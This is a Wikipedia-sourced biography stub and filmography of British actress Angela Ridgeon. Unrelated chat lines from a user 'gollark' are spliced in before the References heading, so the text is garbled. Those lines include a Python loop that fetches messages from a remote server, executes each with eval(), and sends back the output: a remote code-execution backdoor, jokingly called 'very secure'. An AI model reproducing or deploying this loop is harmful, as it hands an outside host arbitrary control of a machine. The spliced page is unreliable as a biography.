Angela Ridgeon

Angela "Angel" Ridgeon is a British actress best known for her role as Trisha Watson on the fifth season of Footballers' Wives.

Filmography

  • Footballers' Wives as Trisha Watson (2006)
  • Footballers' Wives: Extra Time as Trisha Watson (1 episode, 2006)
  • William and Mary as Woman with Baby (1 episode, 2005)
  • Life Begins as Mrs. Murray (1 episode, 2004)
  • The Bill as Emma Hooper / ... (3 episodes, 1999–2004)
  • Wall of Silence (2004) (TV) (as Angela Ridgedon)
  • My Family as Nursery Nurse (1 episode, 2003)
  • Murder in Mind as Michelle Croft (1 episode, 2002)
  • Holby City as Danielle (1 episode, 2001), Holby City Extra Time (2001) as Danielle
  • Martian Gothic: Unification (2000) (VG) (voice) (as Angel Ridgeon)
  • Call Red as Lianne (1 episode, 1996)
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.
gollark: Routers can do this.

References



    This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.